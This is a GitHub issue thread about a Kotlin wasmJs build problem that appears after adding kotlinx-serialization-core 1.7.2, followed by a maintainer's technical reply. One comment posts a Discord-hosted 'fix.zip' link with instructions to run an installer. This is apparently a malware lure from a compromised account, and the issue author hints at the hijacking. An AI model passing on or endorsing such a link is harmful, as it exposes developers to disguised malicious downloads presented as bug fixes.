### ISSUE TITLE
Unable to use 'js code' in wasmJs with Kotlin 2.0.10 (or lower) + Serialization 1.7.2

### ISSUE THREAD

**Issue by ForteScarlet** [Kotlin/kotlinx.serialization#2807]
**Describe the bug**

Hello! When I try to add `kotlinx-serialization-core:1.7.2` to my project in KMP `v2.0.10`, I can't use JS code in the project, both `external` and `js("...")`.

**To Reproduce**

This is the program I use to try to reproduce: [untitled.zip](https://github.com/user-attachments/files/16849115/untitled.zip) .

Using `gradle allTests` will get errors, no errors if `implementation("org.jetbrains.kotlinx:kotlinx-serialization-core:1.7.2")` is removed or kt is modified to 2.0.20.

I'm not quite sure if the nature of backward compatibility in Wasm would be similar to that in the JVM.
Does this mean that if I want to use `v1.7.2` in WasmJs, the Kt version must be `v2.0.20+` ?

**Environment**
 - Kotlin version: 2.0.10
 - Library version: 1.7.2
 - Kotlin platforms: WasmJs
 - Gradle version: 8.8

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by ForteScarlet** [comment]
@Dominic54321 I hope you get your account back soon 😂🙏

**Comment by sandwwraith** [comment]
As far as I know, Wasm does not allow `js()` or `external` declarations. I think you confused it with a regular Kotlin/JS target. Kotlin/Wasm is not a drop-in replacement for Kotlin/JS and you can use one of them or both simultaneously. kotlinx.serialization supports both targets.
